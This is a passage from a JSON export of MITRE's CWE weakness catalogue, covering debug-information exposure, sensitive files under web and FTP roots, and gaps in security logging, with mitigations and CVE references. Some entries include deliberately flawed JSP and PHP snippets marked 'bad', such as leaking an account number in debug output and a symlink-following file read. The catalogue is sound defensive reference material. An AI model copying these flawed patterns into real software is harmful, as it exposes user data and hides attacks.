attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Do not leave debug statements that could be executed in the source code. Ensure that all debug information is eradicated before releasing the software."},{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-131"},"Intro_Text":"The following program changes its behavior based on a debug flag.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"<% if (Boolean.getBoolean(\\"debugEnabled\\")) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"%>User account number: <%= acctNo %><%} %>","xhtml:br":["","","",""]}}}},"Body_Text":"The code writes sensitive debug information to the client browser if the \\"debugEnabled\\" flag is set to true ."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-2268","Description":"Password exposed in debug information.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2268"},{"Reference":"CVE-2002-0918","Description":"CGI script includes sensitive information in debug messages when an error is triggered.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0918"},{"Reference":"CVE-2003-1078","Description":"FTP client with debug option enabled shows password to the screen.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1078"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Infoleak Using Debug Information"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A6","Entry_Name":"Information Leakage and Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"This overlaps other categories.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Debug Information","attr":{"@_Date":"2010-09-27"}},{"#text":"Information Exposure Through Debug Information","attr":{"@_Date":"2020-02-24"}}]}},"216":{"attr":{"@_ID":"216","@_Name":"DEPRECATED: Containment Errors (Container Errors)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated, as it was not effective as a weakness and was structured more like a category. In addition, the name is inappropriate, since the \\"container\\" term is widely understood by developers in different ways than originally intended by PLOVER, the original source for this entry.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"Containment Errors (Container Errors)","attr":{"@_Date":"2020-02-24"}}}},"217":{"attr":{"@_ID":"217","@_Name":"DEPRECATED: Failure to Protect Stored Data from Modification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it incorporated and confused multiple weaknesses. The issues formerly covered in this entry can be found at CWE-766 and CWE-767.","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-20","Modification_Comment":"deprecated this entry in favor of new entries which focus on the multiple weaknesses formerly described here, CWE-766 and CWE-767"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Failure to Protect Stored Data from Modification","attr":{"@_Date":"2009-05-27"}}}},"218":{"attr":{"@_ID":"218","@_Name":"DEPRECATED: Failure to provide confidentiality for stored data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it was a duplicate of CWE-493. All content has been transferred to CWE-493.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Failure to Provide Confidentiality for Stored Data","attr":{"@_Date":"2008-09-09"}},{"#text":"DEPRECATED (Duplicate): Failure to provide confidentiality for stored data","attr":{"@_Date":"2021-07-20"}}]}},"219":{"attr":{"@_ID":"219","@_Name":"Storage of File with Sensitive Data Under Web Root","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.","Extended_Description":"Besides public-facing web pages and code, applications may store sensitive data, code that is not directly invoked, or other files under the web document root of the web server. If the server is not configured or otherwise used to prevent direct access to those files, then attackers may obtain this sensitive data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","System Configuration"],"Description":"Avoid storing information under the web root directory."},{"Phase":"System Configuration","Description":"Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the web directory."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1835","Description":"Data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1835"},{"Reference":"CVE-2005-2217","Description":"Data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2217"},{"Reference":"CVE-2002-1449","Description":"Username/password in data file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1449"},{"Reference":"CVE-2002-0943","Description":"Database file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0943"},{"Reference":"CVE-2005-1645","Description":"database file under web root.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1645"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Data Under Web Root"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":{"#text":"Sensitive Data Under Web Root","attr":{"@_Date":"2020-02-24"}}}},"220":{"attr":{"@_ID":"220","@_Name":"Storage of File With Sensitive Data Under FTP Root","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data under the FTP server root with insufficient access control, which might make it accessible to untrusted parties.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Various Unix FTP servers require a password file that is under the FTP root, due to use of chroot."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","System Configuration"],"Description":"Avoid storing information under the FTP root directory."},{"Phase":"System Configuration","Description":"Access control permissions should be set to prevent reading/writing of sensitive files inside/outside of the FTP directory."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive Data Under FTP Root"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":{"#text":"Sensitive Data Under FTP Root","attr":{"@_Date":"2020-02-24"}}}},"221":{"attr":{"@_ID":"221","@_Name":"Information Loss or Omission","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not record, or improperly records, security-relevant information that leads to an incorrect decision or hampers later analysis.","Extended_Description":"This can be resultant, e.g. a buffer overflow might trigger a crash before the product can log the event.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Information loss or omission"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"81"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"222":{"attr":{"@_ID":"222","@_Name":"Truncation of Security-relevant Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0585","Description":"Web browser truncates long sub-domains or paths, facilitating phishing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0585"},{"Reference":"CVE-2004-2032","Description":"Bypass URL filter via a long URL with a large number of trailing hex-encoded space characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2032"},{"Reference":"CVE-2003-0412","Description":"Does not log complete URI of a long request (truncation).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0412"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Truncation of Security-relevant Information"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"223":{"attr":{"@_ID":"223","@_Name":"Omission of Security-relevant Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"The source of an attack will be difficult or impossible to determine. This can allow attacks to the system to continue without notice."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code logs suspicious multiple login attempts.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($userName,$password){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(authenticate($userName,$password)){}else{}","xhtml:div":[{"#text":"return True;","attr":{"@_style":"margin-left:10px;"}},{"#text":"incrementLoginAttempts($userName);if(recentLoginAttempts($userName) > 5){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"writeLog(\\"Failed login attempt by User: \\" . $userName . \\" at \\" + date(\'r\') );","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":""}}}},"Body_Text":"This code only logs failed login attempts when a certain limit is reached. If an attacker knows this limit, they can stop their attack from being discovered by avoiding the limit."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1029","Description":"Login attempts not recorded if user disconnects before maximum number of tries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1029"},{"Reference":"CVE-2002-1839","Description":"Sender\'s IP address not recorded in outgoing e-mail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1839"},{"Reference":"CVE-2000-0542","Description":"Failed authentication attempt not recorded if later attempt succeeds.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0542"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Omission of Security-relevant Information"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Accountability", Page 40"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"224":{"attr":{"@_ID":"224","@_Name":"Obscured Security-relevant Information by Alternate Name","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software records security-relevant information according to an alternate name of the affected entity, instead of the canonical name.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Hide Activities","Gain Privileges or Assume Identity"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();$realFile = $filename;if(is_link($filename)){}if(fileowner($realFile) == $user){}else{}","xhtml:br":["","","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$realFile = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';writeLog($user . \' attempted to access the file \'. $filename . \' on \'. date(\'r\'));","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"While the code logs a bad access attempt, it logs the user supplied name for the file, not the canonicalized file name. An attacker can obscure their target by giving the script the name of a link to the file they are attempting to access. Also note this code contains a race condition between the is_link() and readlink() functions (CWE-363)."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0725","Description":"Attacker performs malicious actions on a hard link to a file, obscuring the real target file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Obscured Security-relevant Information by Alternate Name"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content 